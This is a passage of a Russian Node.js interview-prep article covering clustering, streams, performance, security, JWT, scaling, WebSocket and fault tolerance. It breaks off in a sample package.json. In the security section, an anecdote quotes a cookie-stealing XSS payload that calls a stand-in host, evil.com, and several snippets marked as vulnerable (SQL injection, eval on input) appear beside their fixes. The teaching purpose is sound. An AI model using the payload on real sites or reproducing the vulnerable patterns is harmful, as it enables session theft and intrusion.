Ответ: Кластеризация в Node.js позволяет использовать все ядра процессора путём создания дочерних процессов (воркеров), которые разделяют один и тот же серверный порт. Это решает проблему однопоточности Node.js и позволяет эффективно масштабировать приложения вертикально. Модуль cluster встроен в Node.js и позволяет легко создавать процессы-воркеры:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| const cluster = require('cluster');
const http = require('http');
const numCPUs = require('os').cpus().length;
if (cluster.isMaster) {
// Код основного процесса
console.log(`Мастер-процесс ${process.pid} запущен`);
// Создаём воркеры для каждого ядра CPU
for (let i = 0; i < numCPUs; i++) {
cluster.fork();
}
// Обработка завершения воркера
cluster.on('exit', (worker, code, signal) => {
console.log(`Воркер ${worker.process.pid} завершился с кодом ${code}`);
console.log('Создаём нового воркера...');
cluster.fork(); // Автоматически заменяем упавший воркер
});
} else {
// Код процесса-воркера
http.createServer((req, res) => {
res.writeHead(200);
res.end(`Привет от процесса ${process.pid}`);
}).listen(8000);
console.log(`Воркер ${process.pid} запущен`);
} |
|
cluster и распределяет запросы между воркерами по принципу round-robin (на более новых версиях Node.js). Кластеризация может дать значительный прирост производительности. На одном проекте после внедрения кластеризации на четырёхъядерном сервере мы получили почти четырёхкратное увеличение пропускной способности API с минимальными изменениями в коде. Впрочем, не забывайте, что кластеризация помогает только при CPU-интенсивных операциях — если ваше приложение в основном ожидает I/O, выигрыш может быть незначительным.
32. Что такое стримы (Streams) в Node.js и какие типы стримов существуют?
Ответ: Стримы (Streams) — это одна из фундаментальных концепций Node.js, которая позволяет обрабатывать данные по частям, а не загружать всё в память сразу. Это особенно важно при работе с большими объёмами данных, такими как видео, большие файлы или сетевой трафик. В Node.js существует четыре основных типа стримов:
1. Readable — стримы для чтения данных:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
| const fs = require('fs');
const readableStream = fs.createReadStream('bigfile.txt', { encoding: 'utf8', highWaterMark: 16 * 1024 });
readableStream.on('data', (chunk) => {
console.log(`Получен чанк данных: ${chunk.length} байт`);
});
readableStream.on('end', () => {
console.log('Чтение завершено');
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
| const fs = require('fs');
const writableStream = fs.createWriteStream('output.txt');
writableStream.write('Привет, ');
writableStream.write('мир!');
writableStream.end('\nКонец файла');
writableStream.on('finish', () => {
console.log('Запись завершена');
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
| const net = require('net');
const server = net.createServer((socket) => {
// socket - это duplex stream
socket.write('Привет клиент!');
socket.on('data', (data) => {
console.log(`Получено от клиента: ${data}`);
});
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
| const { Transform } = require('stream');
const zlib = require('zlib');
// zlib.createGzip() - это transform stream для сжатия данных
const inputFile = fs.createReadStream('input.txt');
const outputFile = fs.createWriteStream('input.txt.gz');
const gzip = zlib.createGzip();
inputFile.pipe(gzip).pipe(outputFile); |
|
pipe(), создавая конвейеры обработки данных. Это похоже на конвейеры в Unix-подобных операционных системах.
Один из моих любимых паттернов — использование transform-стримов для парсинга и обработки больших объёмов данных:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| const { Transform } = require('stream');
// Кастомный transform stream для фильтрации JSON-объектов
class FilterStream extends Transform {
constructor(filterFn) {
super({ objectMode: true });
this.filterFn = filterFn;
}
_transform(chunk, encoding, callback) {
if (this.filterFn(chunk)) {
this.push(chunk);
}
callback();
}
}
// Использование в конвейере обработки
fs.createReadStream('huge-data.json')
.pipe(new JsonParseStream()) // Превращает строки в объекты
.pipe(new FilterStream(obj => obj.score > 90)) // Фильтрует объекты
.pipe(new JsonStringifyStream()) // Превращает объекты обратно в строки
.pipe(fs.createWriteStream('filtered-data.json')); |
|
Вопросы о производительности и безопасности
Переходим к, пожалуй, самым мясистым темам — производительность и безопасность. Именно здесь можно увидеть разницу между просто хорошим и действительно опытным Node.js разработчиком. Эти вопросы обычно задают на финальных этапах собеседования, когда пытаются понять, насколько глубоко вы понимаете платформу.
33. Как оптимизировать производительность Node.js приложения?
Ответ: Оптимизация Node.js приложений — это целое искусство, включающее несколько ключевых стратегий:
1. Профилирование и поиск узких мест:
| JavaScript | 1
2
3
4
5
6
7
| // Простое профилирование с console.time
console.time('операция');
// ... код для профилирования
console.timeEnd('операция');
// Использование встроенного профайлера Node.js
node --prof app.js |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
| const cluster = require('cluster');
const numCPUs = require('os').cpus().length;
if (cluster.isMaster) {
for (let i = 0; i < numCPUs; i++) {
cluster.fork();
}
} else {
// Код вашего сервера
} |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| const nodeCache = require('node-cache');
const cache = new nodeCache({ stdTTL: 100 });
function getData(key, cb) {
const cachedValue = cache.get(key);
if (cachedValue) {
return cb(null, cachedValue);
}
// Данных в кэше нет, получаем их из БД
db.query('SELECT * FROM data WHERE id = ?', [key], (err, results) => {
if (err) return cb(err);
// Сохраняем в кэш и возвращаем
cache.set(key, results);
cb(null, results);
});
} |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
| // Плохо: блокируем Event Loop
const users = db.query('SELECT * FROM users').toArray();
processUsers(users);
// Хорошо: используем колбэки или async/await
db.query('SELECT * FROM users', (err, users) => {
if (err) return handleError(err);
processUsers(users);
}); |
|
Помню, как в одном проекте мы столкнулись с тормозами при загрузке большого JSON файла (около 300 МБ). Решение? Отказаться от JSON.parse(fs.readFileSync()) в пользу потоковой обработки с JSONStream:
| JavaScript | 1
2
3
4
5
6
7
8
9
| const fs = require('fs');
const JSONStream = require('JSONStream');
fs.createReadStream('huge-data.json')
.pipe(JSONStream.parse('*.items'))
.on('data', item => {
// Обработка каждого элемента по отдельности
processItem(item);
}); |
|
34. Какие инструменты можно использовать для мониторинга Node.js приложений?
Ответ: Мониторинг — это глаза и уши ваших приложений в продакшене. Основные инструменты:
pm2 — менеджер процессов с базовыми функциями мониторинга:
| Bash | 1
2
3
| npm install pm2 -g
pm2 start app.js --name="my-app" -i max # Запуск в кластерном режиме на всех ядрах
pm2 monit # Просмотр статистики в реальном времени |
|
Elastic APM — опен-сорс альтернатива для трассировки и мониторинга:
| JavaScript | 1
2
3
4
5
| const apm = require('elastic-apm-node').start({
serviceName: 'my-service',
secretToken: 'token',
serverUrl: 'http://localhost:8200'
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| const express = require('express');
const app = express();
const prom = require('prom-client');
// Создаём счётчик для HTTP запросов
const httpRequestsTotal = new prom.Counter({
name: 'http_requests_total',
help: 'Total number of HTTP requests',
labelNames: ['method', 'route', 'status']
});
// Middleware для подсчёта запросов
app.use((req, res, next) => {
res.on('finish', () => {
httpRequestsTotal.inc({
method: req.method,
route: req.route ? req.route.path : req.path,
status: res.statusCode
});
});
next();
});
// Эндпоинт для Prometheus
app.get('/metrics', (req, res) => {
res.set('Content-Type', prom.register.contentType);
res.end(prom.register.metrics());
}); |
|
35. Как обнаружить и устранить утечки памяти в Node.js?
Ответ: Утечки памяти случаются даже в сборщиках мусора, а в Node.js они чаще всего связаны с замыканиями, таймерами и event listeners. Процесс обнаружения:
1. Использование инструментов для получения heap snapshot:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
| // Встроенный модуль для дампа памяти
const heapdump = require('heapdump');
// Сделать дамп памяти по запросу
app.get('/heapdump', (req, res) => {
const filename = `/tmp/heapdump-${Date.now()}.heapsnapshot`;
heapdump.writeSnapshot(filename, (err) => {
if (err) return res.status(500).send(err.message);
res.send(`Heapdump written to ${filename}`);
});
}); |
|
3. Отслеживание использования памяти в коде:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
| const memwatch = require('memwatch-next');
// Отслеживание скачков использования памяти
memwatch.on('leak', (info) => {
console.log('Возможная утечка памяти:', info);
});
// Разница между сборками мусора
memwatch.on('stats', (stats) => {
console.log('Статистика GC:', stats);
}); |
|
Незакрытые слушатели событий: всегда используйте removeListener или removeAllListeners,
Таймеры, которые не очищаются: используйте clearInterval и clearTimeout,
Циклические ссылки: особенно в замыканиях,
Кэширование без лимитов: всегда устанавливайте maxSize для кеша.
Недавно мы мучались с утечкой памяти в продакшене, и оказалось, что причина в кэшировании шаблонов в Express без ограничения размера кэша. Каждый уникальный URL генерировал новую запись в кэше, и через несколько дней память просто взрывалась. Решением стало:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| app.set('view cache', false); // Отключить дефолтный кэш
const LRU = require('lru-cache');
const viewCache = new LRU({ max: 100 }); // Кэш с ограничением
app.use((req, res, next) => {
const render = res.render;
res.render = function(view, options, callback) {
const cacheKey = `${view}-${JSON.stringify(options)}`;
const cachedHTML = viewCache.get(cacheKey);
if (cachedHTML) {
return res.send(cachedHTML);
}
render.call(this, view, options, (err, html) => {
if (!err) {
viewCache.set(cacheKey, html);
}
if (typeof callback === 'function') {
callback(err, html);
} else {
res.send(html);
}
});
};
next();
}); |
|
36. Какие основные уязвимости безопасности существуют в Node.js приложениях?
Ответ: Безопасность — тема, которую нелзя игнорировать. Основные уязвимости:
1. Инъекции (SQL, NoSQL, Command):
| JavaScript | 1
2
3
4
5
| // Уязвимый код
db.query(`SELECT * FROM users WHERE username = '${username}'`); // SQL инъекция
// Безопасный код
db.query('SELECT * FROM users WHERE username = ?', [username]); |
|
| JavaScript | 1
2
3
4
5
6
| // Уязвимый код
res.send(`Привет, ${username}!`); // Если username содержит HTML/JS
// Безопасный код с Express
const escapeHtml = require('escape-html');
res.send(`Привет, ${escapeHtml(username)}!`); |
|
| JavaScript | 1
2
3
4
5
| // Уязвимый код
const obj = JSON.parse(data); // OK для JSON
const obj = eval('(' + data + ')'); // Крайне небезопасно!
// Для других форматов используйте проверенные библиотеки |
|
| Bash | 1
2
| npm audit
npm audit fix |
|
| JavaScript | 1
2
3
4
5
| // Плохо
const password = 'SuperSecret123';
// Хорошо
const password = process.env.DB_PASSWORD; |
|
| JavaScript | 1
2
3
4
5
6
| // Хеширование пароля
const bcrypt = require('bcrypt');
const hashedPassword = await bcrypt.hash(password, 10);
// Сравнение
const match = await bcrypt.compare(password, hashedPassword); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
| // Слишком разрешительные настройки
app.use(cors()); // Разрешает все домены
// Более безопасно
app.use(cors({
origin: ['https://trusted-site.com'],
methods: ['GET', 'POST'],
credentials: true
})); |
|
<script>document.location='https://evil.com?cookie='+document.cookie</script>, и понеслась... С тех пор мы используем CSP (Content Security Policy) для всех проектов:
| JavaScript | 1
2
3
4
| app.use((req, res, next) => {
res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'");
next();
}); |
|
37. Как обеспечить безопасную обработку пользовательского ввода в Node.js?
Ответ: Безопасная обработка пользовательского ввода — фундаментальный принцип веб-безопасности. В Node.js это включает:
1. Валидация и санитизация на сервере (никогда не доверяйте фронтенду):
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| const { body, validationResult } = require('express-validator');
app.post('/user',
// Валидация
body('email').isEmail().normalizeEmail(),
body('password').isLength({ min: 8 }),
body('name').trim().escape(), // Санитизация от HTML/JS-инъекций
(req, res) => {
const errors = validationResult(req);
if (!errors.isEmpty()) {
return res.status(400).json({ errors: errors.array() });
}
// Безопасно использовать данные
createUser(req.body);
}
); |
|
| JavaScript | 1
2
3
4
5
| // MongoDB (с Mongoose)
User.findOne({ username: username }) // Параметры автоматически эскейпятся
// Vanilla SQL
connection.query('SELECT * FROM users WHERE id = ?', [userId]); |
|
| JavaScript | 1
2
3
| const bodyParser = require('body-parser');
app.use(bodyParser.json({ limit: '1mb' }));
app.use(bodyParser.urlencoded({ limit: '1mb', extended: true })); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| const multer = require('multer');
const upload = multer({
limits: { fileSize: 5 * 1024 * 1024 }, // 5MB
fileFilter: (req, file, cb) => {
const allowedTypes = ['image/jpeg', 'image/png'];
if (!allowedTypes.includes(file.mimetype)) {
return cb(new Error('Invalid file type'));
}
cb(null, true);
}
});
app.post('/upload', upload.single('avatar'), (req, res) => {
// Файл прошел все проверки
}); |
|
38. Как внедрить HTTPS в Node.js приложение?
Ответ: HTTPS — обязательный стандарт для современных веб-приложений. Внедрить его в Node.js довольно просто:
1. Получите SSL-сертификат — коммерческий или бесплатный (Let's Encrypt)
2. Создайте HTTPS-сервер:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| const https = require('https');
const fs = require('fs');
const express = require('express');
const app = express();
// Ваши маршруты и middleware
app.get('/', (req, res) => {
res.send('Привет из защищённого сервера!');
});
// Настройка SSL
const options = {
key: fs.readFileSync('/path/to/privkey.pem'),
cert: fs.readFileSync('/path/to/cert.pem'),
ca: fs.readFileSync('/path/to/chain.pem') // Если есть цепочка сертификатов
};
// Создание HTTPS-сервера
https.createServer(options, app).listen(443, () => {
console.log('HTTPS сервер запущен на порту 443');
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
| const http = require('http');
const express = require('express');
const httpApp = express();
// Перенаправление всех HTTP запросов на HTTPS
httpApp.all('*', (req, res) => {
res.redirect(301, [INLINE]https://${req.hostname}${req.url}[/INLINE]);
});
http.createServer(httpApp).listen(80); |
|
| JavaScript | 1
2
3
4
| app.use((req, res, next) => {
res.setHeader('Strict-Transport-Security', 'max-age=31536000; includeSubDomains; preload');
next();
}); |
|
39. Как реализовать аутентификацию с помощью JWT в Node.js?
Ответ: JWT (JSON Web Token) — популярный механизм аутентификации для современных веб-приложений и API. JWT представляет собой закодированный JSON-объект, подписанный секретным ключом, что гарантирует его целостность.
Реализация JWT в Node.js обычно включает следующие шаги:
1. Установка зависимостей:
| Bash | 1
| npm install jsonwebtoken bcrypt |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| const jwt = require('jsonwebtoken');
const bcrypt = require('bcrypt');
app.post('/login', async (req, res) => {
const { username, password } = req.body;
// Поиск пользователя в БД
const user = await User.findOne({ username });
if (!user) {
return res.status(401).json({ message: 'Пользователь не найден' });
}
// Проверка пароля
const validPassword = await bcrypt.compare(password, user.password);
if (!validPassword) {
return res.status(401).json({ message: 'Неверный пароль' });
}
// Создание JWT токена
const token = jwt.sign(
{ id: user._id, username: user.username, role: user.role },
process.env.JWT_SECRET,
{ expiresIn: '1h' } // Токен действителен 1 час
);
res.json({ token });
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| function authenticateToken(req, res, next) {
const authHeader = req.headers['authorization'];
const token = authHeader && authHeader.split(' ')[1]; // Bearer TOKEN
if (!token) {
return res.status(401).json({ message: 'Нет токена авторизации' });
}
jwt.verify(token, process.env.JWT_SECRET, (err, user) => {
if (err) {
return res.status(403).json({ message: 'Недействительный токен' });
}
req.user = user; // Добавляем данные пользователя в объект запроса
next();
});
}
// Защита маршрута
app.get('/protected', authenticateToken, (req, res) => {
res.json({ message: `Привет, ${req.user.username}!` });
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
| function authorizeRole(role) {
return (req, res, next) => {
if (req.user.role !== role) {
return res.status(403).json({ message: 'Нет доступа' });
}
next();
};
}
// Маршрут только для администраторов
app.get('/admin', authenticateToken, authorizeRole('admin'), (req, res) => {
res.json({ message: 'Панель администратора' });
}); |
|
40. Каковы основные способы масштабирования Node.js приложений?
Ответ: Масштабирование — это искуство заставить ваше приложение обрабатывать больше запросов без ущерба для производительности. Существует несколько основных подходов:
1. Вертикальное масштабирование — увеличение мощности отдельного сервера:
- Использование кластерного модуля (cluster) для задействования всех CPU.
- Оптимизация кода и управления памятью.
- Увеличение ресурсов сервера (CPU, RAM).
2. Горизонтальное масштабирование — увеличение количества серверов:
- Балансировка нагрузки между несколькими инстансами приложения.
- Stateless архитектура (состояние хранится вне приложения).
- Распределенное кэширование (Redis, Memcached).
3. Микросервисная архитектура — разделение монолита на отдельные сервисы:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| // Сервис пользователей
const express = require('express');
const app = express();
app.get('/api/users/:id', async (req, res) => {
// Логика получения пользователя
});
app.listen(3001);
// Сервис продуктов (отдельное приложение)
const express = require('express');
const app = express();
app.get('/api/products/:id', async (req, res) => {
// Логика получения продукта
});
app.listen(3002); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| // Отправка задачи в очередь
const amqp = require('amqplib');
async function publishToQueue(task) {
const connection = await amqp.connect('amqp://localhost');
const channel = await connection.createChannel();
await channel.assertQueue('tasks_queue');
channel.sendToQueue('tasks_queue', Buffer.from(JSON.stringify(task)));
console.log("Задача отправлена в очередь");
setTimeout(() => {
connection.close();
}, 500);
}
// Обработчик задач (отдельный процесс)
async function processQueue() {
const connection = await amqp.connect('amqp://localhost');
const channel = await connection.createChannel();
await channel.assertQueue('tasks_queue');
console.log("Ожидание задач...");
channel.consume('tasks_queue', (msg) => {
const task = JSON.parse(msg.content.toString());
// Длительная обработка задачи
processTask(task);
channel.ack(msg);
});
} |
|
- Шардинг,
- Репликация,
- Индексация,
- Денормализация данных для часто запрашиваемой информации.
Я как-то работал с проектом, где мы начали с монолита на одном сервере. Когда нагрузка выросла, мы попробовали просто добавить больше серверов... и все развалилось. Почему? Потому что сессии хранились в памяти процесса, и пользователи перенаправлялись на разные серверы! Решением стало вынесение сессий в Redis:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| const session = require('express-session');
const RedisStore = require('connect-redis').default;
const { createClient } = require('redis');
// Создание клиента Redis
const redisClient = createClient({ url: 'redis://localhost:6379' });
redisClient.connect().catch(console.error);
// Настройка хранилища сессий
const redisStore = new RedisStore({
client: redisClient,
prefix: "myapp:"
});
app.use(session({
store: redisStore,
secret: process.env.SESSION_SECRET,
resave: false,
saveUninitialized: false
})); |
|
41. Как работать с WebSocket в Node.js для создания приложений реального времени?
Ответ: WebSocket — протокол, который обеспечивает полнодуплексный канал связи через одно TCP-соединение, идеальный для приложений реального времени. В Node.js чаще всего используются библиотеки Socket.IO и ws.
Пример с Socket.IO:
1. Настройка сервера:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| const express = require('express');
const http = require('http');
const { Server } = require('socket.io');
const app = express();
const server = http.createServer(app);
const io = new Server(server);
app.get('/', (req, res) => {
res.sendFile(__dirname + '/index.html');
});
// Обработка соединений
io.on('connection', (socket) => {
console.log('Пользователь подключился');
// Отправка сообщения конкретному клиенту
socket.emit('welcome', { message: 'Добро пожаловать!' });
// Отправка всем кроме отправителя
socket.on('chat message', (msg) => {
socket.broadcast.emit('chat message', msg);
});
// Отправка всем включая отправителя
socket.on('global event', (data) => {
io.emit('global event', data);
});
// Комнаты (каналы)
socket.on('join room', (room) => {
socket.join(room);
io.to(room).emit('room message', [INLINE]Новый пользователь в комнате ${room}[/INLINE]);
});
socket.on('disconnect', () => {
console.log('Пользователь отключился');
});
});
server.listen(3000, () => {
console.log('Сервер запущен на порту 3000');
}); |
|
| HTML5 | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| <!DOCTYPE html>
<html>
<head>
<title>Socket.IO чат</title>
<script src="/socket.io/socket.io.js"></script>
<script>
const socket = io();
// Получение сообщений
socket.on('welcome', (data) => {
console.log(data.message);
});
socket.on('chat message', (msg) => {
const messages = document.getElementById('messages');
const li = document.createElement('li');
li.textContent = msg;
messages.appendChild(li);
});
// Отправка сообщений
function sendMessage() {
const input = document.getElementById('m');
socket.emit('chat message', input.value);
input.value = '';
return false;
}
// Присоединение к комнате
function joinRoom(room) {
socket.emit('join room', room);
}
</script>
</head>
<body>
<ul id="messages"></ul>
<form onsubmit="return sendMessage();">
<input id="m" autocomplete="off" /><button>Отправить</button>
</form>
<button onclick="joinRoom('general')">Общая комната</button>
<button onclick="joinRoom('dev')">Комната разработчиков</button>
</body>
</html> |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| const express = require('express');
const { createServer } = require('http');
const { Server } = require('socket.io');
const { createAdapter } = require('@socket.io/redis-adapter');
const { createClient } = require('redis');
const app = express();
const server = createServer(app);
const io = new Server(server);
// Настройка Redis-адаптера
const pubClient = createClient({ url: 'redis://localhost:6379' });
const subClient = pubClient.duplicate();
Promise.all([pubClient.connect(), subClient.connect()]).then(() => {
io.adapter(createAdapter(pubClient, subClient));
io.on('connection', (socket) => {
// Теперь сообщения будут работать между разными инстансами
// приложения, подключенными к одному Redis
});
server.listen(3000);
}); |
|
42. Как обеспечить отказоустойчивость Node.js приложений?
Ответ: Отказоустойчивость — способность системы продолжать работу при сбоях. Для Node.js приложений это включает:
1. Перехват и обработка необработанных исключений:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
| // Глобальные обработчики ошибок
process.on('uncaughtException', (err) => {
console.error('Необработанное исключение:', err);
// Сохранение диагностической информации, уведомление
// Корректное завершение процесса после обработки всех запросов
gracefulShutdown();
});
process.on('unhandledRejection', (reason, promise) => {
console.error('Необработанный reject промиса:', reason);
}); |
|
| Bash | 1
2
3
4
5
6
7
8
| # Установка PM2
npm install pm2 -g
# Запуск приложения с автоперезапуском
pm2 start app.js --name "my-app" --max-memory-restart 300M
# Кластерный режим для отказоустойчивости и балансировки
pm2 start app.js -i max |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| function gracefulShutdown() {
console.log('Запуск корректного завершения');
// Прекратить принимать новые запросы
server.close(() => {
console.log('HTTP сервер закрыт');
// Закрыть соединения с БД
mongoose.connection.close(() => {
console.log('Соединения с БД закрыты');
process.exit(0);
});
});
// Если не удалось завершить за 10 секунд, принудительное завершение
setTimeout(() => {
console.error('Принудительное завершение!');
process.exit(1);
}, 10000);
}
// Обработка сигналов от OS
process.on('SIGTERM', gracefulShutdown);
process.on('SIGINT', gracefulShutdown); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| const CircuitBreaker = require('opossum');
// Создание circuit breaker для внешнего API
const breaker = new CircuitBreaker(callExternalAPI, {
timeout: 3000, // Таймаут операции
errorThresholdPercentage: 50, // % ошибок перед размыканием
resetTimeout: 10000 // Время до повторной попытки
});
// Обработка событий
breaker.on('open', () => console.log('Circuit Breaker открыт'));
breaker.on('close', () => console.log('Circuit Breaker закрыт'));
breaker.on('halfOpen', () => console.log('Circuit Breaker полуоткрыт'));
breaker.on('fallback', () => console.log('Использую запасной вариант'));
// Использование
app.get('/api/data', async (req, res) => {
try {
const result = await breaker.fire(req.query.id);
res.json(result);
} catch (err) {
// Обработка ошибки или использование fallback
res.status(503).json({ error: 'Сервис временно недоступен' });
}
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| // Повторная отправка при сбое
const amqp = require('amqplib');
async function sendToQueue(data, maxRetries = 3) {
let retries = 0;
async function attempt() {
try {
const connection = await amqp.connect('amqp://localhost');
const channel = await connection.createChannel();
await channel.assertQueue('important_queue', { durable: true });
channel.sendToQueue('important_queue', Buffer.from(JSON.stringify(data)), {
persistent: true // Сообщение сохранится даже при перезапуске RabbitMQ
});
await channel.close();
await connection.close();
} catch (err) {
console.error(`Ошибка при отправке (попытка ${retries + 1}):`, err);
if (++retries < maxRetries) {
// Экспоненциальная выдержка между попытками
const delay = Math.pow(2, retries) * 1000;
console.log(`Повторная попытка через ${delay}мс`);
setTimeout(attempt, delay);
} else {
console.error('Максимальное число попыток исчерпано');
throw err;
}
}
}
return attempt();
} |
|
Нестандартные вопросы и задачи с примерами кода
Иногда на собеседованиях встречаются вопросы, которые не найдёшь в стандартных списках. Они проверяют не знание API, а понимание внутренних механизмов Node.js и способность нестандартно мыслить. Давайте рассмотрим несколько таких задач.
Создание кастомного middleware для измерения времени выполнения запроса
Интервьюеры любят просить написать собственный middleware, например, для измерения производительности:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| function responseTimeMiddleware(req, res, next) {
// Сохраняем время начала запроса
const start = process.hrtime();
// Отлавливаем событие окончания запроса
res.on('finish', () => {
// Получаем время в наносекундах и переводим в миллисекунды
const diff = process.hrtime(start);
const responseTime = diff[0] * 1000 + diff[1] / 1000000;
console.log(`Запрос ${req.method} ${req.url} обработан за ${responseTime.toFixed(2)} мс`);
// В реальном приложении здесь можно отправлять метрики
// в систему мониторинга типа Prometheus
});
next();
}
// Использование
app.use(responseTimeMiddleware); |
|
next(). Классическая ошибка! Все запросы просто зависли, никогда не доходя до обработчиков. Поэтому всегда проверяйте flow в middleware.
Задача на управление памятью: создание сборщика мусора для кэша
А вот задача посложнее — реализовать самоочищающийся кэш с защитой от утечек памяти:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
| class AutoCleanCache {
constructor(maxSize = 100, cleanInterval = 60000) {
this.cache = new Map();
this.maxSize = maxSize;
this.lastAccessed = new Map(); // Время последнего доступа
// Запуск автоочистки
this.cleanIntervalId = setInterval(() => this.cleanOldEntries(), cleanInterval);
// Не забываем очистить интервал при выгрузке модуля
process.on('beforeExit', () => {
clearInterval(this.cleanIntervalId);
});
}
set(key, value, ttl = 3600000) { // По умолчанию 1 час
// Контроль размера кэша
if (this.cache.size >= this.maxSize) {
this.removeOldest();
}
this.cache.set(key, {
value,
expires: Date.now() + ttl
});
this.updateAccessTime(key);
}
get(key) {
const entry = this.cache.get(key);
if (!entry) return null;
// Проверка на истекшее время жизни
if (entry.expires < Date.now()) {
this.cache.delete(key);
this.lastAccessed.delete(key);
return null;
}
this.updateAccessTime(key);
return entry.value;
}
updateAccessTime(key) {
this.lastAccessed.set(key, Date.now());
}
removeOldest() {
// Находим самую старую запись
let oldestKey = null;
let oldestTime = Infinity;
for (const [key, accessTime] of this.lastAccessed.entries()) {
if (accessTime < oldestTime) {
oldestTime = accessTime;
oldestKey = key;
}
}
if (oldestKey) {
this.cache.delete(oldestKey);
this.lastAccessed.delete(oldestKey);
}
}
cleanOldEntries() {
const now = Date.now();
// Удаляем истекшие записи
for (const [key, entry] of this.cache.entries()) {
if (entry.expires < now) {
this.cache.delete(key);
this.lastAccessed.delete(key);
}
}
}
}
// Использование
const cache = new AutoCleanCache(1000, 30000);
cache.set('user:1', { name: 'John' }); |
|
Заключение: рекомендации по подготовке к собеседованию
Собеседования по Node.js — настоящие американские горки для большинства разработчиков. Как человек, побывавший по обе стороны баррикад, поделюсь несколькими проверенными в бою советами:
1. Прокачайте фундамент. Асинхронность, Event Loop, буферы, стримы — не просто выучите определения, а поймите, как они работают внутри. Собеседования редко остаются на поверхности, копают глубоко.
2. Пишите код каждый день. Решайте алгоритмические задачи на LeetCode и HackerRank, но с фокусом на Node.js-специфичные особенности — асинхронность, работу с потоками данных, управление памятью.
3. Ведите дневник ошибок. Каждый баг, каждая головоломка, с которой вы сталкиваетесь — это потенциальный вопрос на собеседовании. Записывайте проблемы и решения.
4. Создайте тестовый проект. Мини-приложение, где вы имплементируете различные паттерны и практики, упомянутые в этой статье. Реальный код говорит громче отрепетированных ответов.
5. Делайте code review. Разбирайте чужой код в open-source проектах — это откроет глаза на многообразие подходов к решению одних и тех же задач.
Помните, что лучшие кандидаты — не те, кто знает все ответы, а те, кто умеет структурировано мыслить и не боится признать, когда чего-то не знают. Удачи вам на следующем собеседовании — воспринимайте его как возможность поучиться, а не испытание.
Пример полного рабочего приложения на Node.js
Давайте соединим вместе все концепции, которые мы разобрали, и создадим полное рабочее приложение. Это будет API сервер для блога с аутентификацией, обработкой статей и комментариев, а также WebSocket уведомлениями о новых комментариях. Структура проекта:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| blog-api/
├── config/
│ ├── database.js
│ └── jwt.js
├── controllers/
│ ├── articlesController.js
│ └── authController.js
├── middleware/
│ ├── auth.js
│ └── errorHandler.js
├── models/
│ ├── Article.js
│ └── User.js
├── routes/
│ ├── articles.js
│ └── auth.js
├── utils/
│ ├── cache.js
│ └── logger.js
├── app.js
├── server.js
└── package.json |
|
package.json
| JSON | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| {
"name": "blog-api",
"version": "1.0.0",
"description": "Node.js блог API с JWT и WebSocket",
"main": "server.js",
"scripts": {
"start": "node server.js",
"dev": "nodemon server.js"
},
"dependencies": {
"bcrypt": "^5.1.0",
"cors": "^2.8.5",
"dotenv": "^16.0.3",
"express": "^4.18.2",
"express-rate-limit": "^6.7.0",
"helmet": "^6.1.0",
"jsonwebtoken": "^9.0.0",
"mongoose": "^7.0.3",
